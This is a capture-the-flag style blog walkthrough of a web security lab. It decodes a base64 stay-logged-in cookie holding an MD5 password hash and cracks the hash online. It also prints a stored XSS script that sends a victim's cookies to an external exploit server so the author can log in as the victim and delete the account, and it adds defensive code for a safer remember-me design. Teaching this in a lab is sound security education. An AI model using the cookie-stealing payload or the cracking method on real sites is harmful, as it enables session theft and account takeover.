Offline password cracking

Abdullah Hamza
6 min read, Jul 23, 2024


To access the lab visit the following link:

This lab stores the user’s password hash in a cookie. The lab also contains an XSS vulnerability in the comment functionality. To solve the lab, obtain Carlos’s stay-logged-in cookie and use it to crack his password. Then, log in as carlos and delete his account from the "My account" page.

  • Your credentials: wiener:peter
  • Victim’s username: carlos

Click on the given button to access the lab:

On the lab's homepage we can see the "My account" option. Let's click on it to attempt a login.

Lab homepage

Let's log in with the correct username and password and capture the login request in Burp. This lets us see the login functionality of the application and how its authentication works.

login using provided credentials

We are successfully logged in to the application.

Response from server

Let's look at the POST request in Burp's HTTP history. The login POST request contains the username, the password and a stay-logged-in field, which indicates a preference to stay logged in and is usually implemented as a checkbox on the login form. The value "on" shows that the user has selected the option to remain logged in across sessions.

Login POST request

Looking at the response, we can see the standard session cookie and the stay-logged-in cookie.

Cookies in response of login request

Next, let's copy the stay-logged-in cookie and go to the Decoder in Burp Suite. Decoder lets us decode the cookie's value, which might be encoded in a format such as Base64. Decoding it reveals the actual data stored in the cookie, which helps us analyze its contents and understand how the application handles persistent login sessions.

Paste the stay-logged-in cookie into Decoder, click "Decode as" and select the Base64 option from the menu. The decoded cookie is shown below.

Decoding cookie in decoder

The decoded cookie contains the username and a hash.

Decoded cookie in decoder

Let’s try to crack that hash. Go to CrackStation.

Paste the copied hash into CrackStation and click on "Crack Hash." The hash is cracked successfully, revealing that it is an MD5 hash corresponding to wiener's password.

Hash cracked using crackstation

Through our analysis, we have learned that the stay-logged-in cookie is actually a Base64 encoded string that combines the username and the MD5 hash of the user's password in the following format:

username:md5hashpassword

For example, if the username is "wiener" and the MD5 hash of the password is "51dc30ddc473d43a6011e9ebba6ca770", the stay-logged-in cookie will contain the Base64 encoded version of "wiener:51dc30ddc473d43a6011e9ebba6ca770".
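As an added illustration (not code from the post or from the lab), the cookie scheme just described next to a hardened remember-me design; RememberMeStore and set_cookie_header are assumed helper names, not the lab's own code:

```python
import base64
import hashlib
import secrets
from typing import Dict, Optional, Tuple

# Weak scheme as observed in the lab: base64("username:md5(password)").
# The cookie itself is enough to crack the password offline, because MD5
# is fast and unsalted and the cookie never expires or rotates.
def build_weak_cookie(username: str, password: str) -> str:
    digest = hashlib.md5(password.encode()).hexdigest()
    return base64.b64encode(f"{username}:{digest}".encode()).decode()

def parse_weak_cookie(cookie: str) -> Tuple[str, str]:
    """Decode a stay-logged-in cookie into (username, md5_hex)."""
    username, digest = base64.b64decode(cookie).decode().split(":", 1)
    return username, digest

# Hardened design (an assumption, not the lab's implementation): the cookie
# carries only a random token; the server stores a hash of the token, so a
# stolen cookie reveals nothing about the password and can be revoked.
class RememberMeStore:
    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}  # sha256(token) -> username

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, username: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits of randomness
        self._tokens[self._key(token)] = username
        return token

    def verify(self, token: str) -> Optional[str]:
        return self._tokens.get(self._key(token))

    def revoke(self, token: str) -> None:
        self._tokens.pop(self._key(token), None)

def set_cookie_header(token: str, max_age: int = 30 * 24 * 3600) -> str:
    """Set-Cookie value: HttpOnly keeps document.cookie (as used by the
    XSS payload later in this post) from reading the token at all."""
    return (f"stay-logged-in={token}; Max-Age={max_age}; Path=/; "
            "Secure; HttpOnly; SameSite=Lax")
```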

From the lab's description we know that the lab also contains an XSS vulnerability in the comment functionality. Let's exploit that to obtain the stay-logged-in cookie of the victim (carlos).

Let's log out of wiener's account.

logging out from wiener’s account

On the lab's homepage there is a "View post" button at the end of each blog post. Let's click on it to open the post.

view post button for blog post

Scrolling down the post, we notice an option to add a comment. We will insert an XSS payload in the comment section to capture the victim's stay-logged-in cookie.

Comment section of blog post

Before that, note the "Go to exploit server" button on the lab homepage. Let's go to the exploit server and copy its URL, which is where our XSS payload will send the victim's cookie.

exploit server button

The exploit server page shows its URL. Let's copy that link and build an XSS payload from it.

Exploit server link

Let's get back to the comment section of the blog post and add the payload to the comment as shown in the image below.

  • When this payload executes, it redirects the user's browser to the exploit server.
  • The user's cookies are appended to this URL as a query string parameter. In this way we can steal the victim's cookies.

<script>document.location='https://exploit-0aad009f0411ee79837e720401ff000b.exploit-server.net/exploit'+document.cookie</script>

Adding payload to the comment section

As soon as we post the comment, the page says "Thank you for your comment!". Now let's get back to our exploit server.

Comment submitted successfully

On the exploit server there is an "Access log" button at the bottom of the page. Let's click on it to see the captured logs.

Access log button

The exploit server's logs show that someone (presumably the victim) visited the blog post, and we now have their IP address and stay-logged-in cookie.

Stay logged in cookie found

Let's copy this cookie and decode it in Decoder. The decoded cookie belongs to the victim (carlos).

Cookie decoded in decoder

Let's copy the MD5 hash from the cookie and crack it using CrackStation. Cracking the hash gives us the victim's password.

Hash cracked using crack station

Now that we have the victim's password, let's go to the login page and log in with the victim's credentials.

Logging in with victim’s credentials

We are successfully logged in. On carlos's account page we can see the "Delete account" button. Let's click on it to delete the account.

Delete account button on home page

It asks for the user's password before proceeding.

Authentication required to delete the account

The user account is deleted and the lab is also marked as solved.

Congratulations! This concludes the walkthrough of the tenth authentication lab.

You can read the walkthrough of the eleventh lab at the following link:

Written by Abdullah Hamza

Developer | CEH | Penetration Tester | Red Team